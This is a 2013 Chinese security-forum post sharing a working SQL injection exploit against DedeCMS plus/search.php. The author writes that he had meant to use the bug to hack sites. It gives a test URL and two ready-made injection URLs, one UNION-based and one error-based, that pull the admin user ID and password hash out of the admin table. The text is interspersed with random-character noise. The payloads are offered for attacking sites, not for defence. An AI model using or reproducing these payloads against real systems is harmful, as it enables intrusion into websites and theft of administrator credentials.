找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2061|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ4 |; y( Q+ J: F9 T% z6 x4 ]& R5 ^  N

$ ]" h3 T2 E, ~/ n哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 u" g6 r$ ]1 J! g& }& k% u
) I; i% n0 a: B1 P既然已经发出来了,我就把我自己搞的exp发下吧。。唉。, ]9 ~: Z; i, O

: `, K/ Q6 l1 E( J; e我一般是这样测试的:
, z0 W( `% C" Q
7 z# z4 E) r7 ~# Y提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
! M( y% S3 Q+ H- ^4 D4 L
1 z/ d: U6 i/ m4 N, `& g转载不加作者名的没JJ- h" L2 }! p) ~5 N3 d) y
; E  {4 @. w5 G" T5 T& p( t- _
作者:鬼哥# T. `- x$ c- i2 y- N8 p$ X

9 d: @0 }7 f& P+ r3 i7 a9 Z) N ; x$ H/ ~; U( b2 I  b/ n
" y2 M+ h& ^/ C5 M9 B
看结果如果提示9 U( P. K" c! x0 ~
; V" \& J2 p: k+ f8 v, _( }. \+ {
Safe Alert: Request Error step 2 !! A  {4 r6 G: ]2 b  Y1 N2 M
) a# Z$ Q7 j9 f# N
那么直接用下面的exp
* W/ `* l! p3 d- E) K  g& p0 T9 Q7 M4 N: Y2 `2 U( i( I
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% q0 L9 j* l  X) c+ F* U1 S
" @, R: h/ S8 B) X# c6 I
& Y0 x7 t  {) l6 z  q- t看结果如果提示
! V% l8 ~! l2 _+ P; t' l8 l  s9 V
Safe Alert: Request Error step 1 !
' F$ F# u& _- \3 y9 i
# ~7 ]7 q3 R4 |4 M: x* H1 q那么直接用下面的exp# c- ?2 x2 t" R4 f- D
8 S6 |2 f3 `8 o3 T
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
* g2 {: K* L( [) X0 M- J9 t3 a% ?. A0 r" [- ?1 k/ A. S
7 c; q' q1 p! M: X7 n/ e
如果正常显示证明漏洞不存在了。' f" D: M/ z. T" c. M. G2 ]0 o
3 A$ b; U" ~: I& Z, r, v# I
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表